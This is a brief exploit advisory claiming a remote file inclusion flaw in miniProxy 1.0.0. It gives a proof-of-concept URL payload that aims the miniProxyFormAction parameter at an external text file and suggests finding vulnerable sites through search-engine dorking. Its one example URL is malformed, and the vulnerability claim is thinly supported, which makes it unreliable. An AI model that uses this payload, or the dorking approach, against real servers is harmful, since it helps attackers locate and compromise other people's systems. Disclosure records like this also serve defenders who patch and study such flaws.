Headline
miniProxy 1.0.0 Remote File Inclusion
miniProxy version 1.0.0 suffers from a remote file inclusion vulnerability.
====================================================================================================================================| # Title : miniProxy 1.0.0 File inclusion Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https://github.com/joshdick/miniProxy |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /miniProxy_orig.php?commit=%ef%80%82&miniProxyFormAction=http://testasp.vulnweb.com/t/fit.txt%3F.org/privacy/tos&previous_text=&search_text=[+] https://www/127.0.0.1/miniProxy/miniProxy_orig.php?commit=%ef%80%82&miniProxyFormAction=http://testasp.vulnweb.com/t/fit.txt%3F.org/privacy/tos&previous_text=&search_text=Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================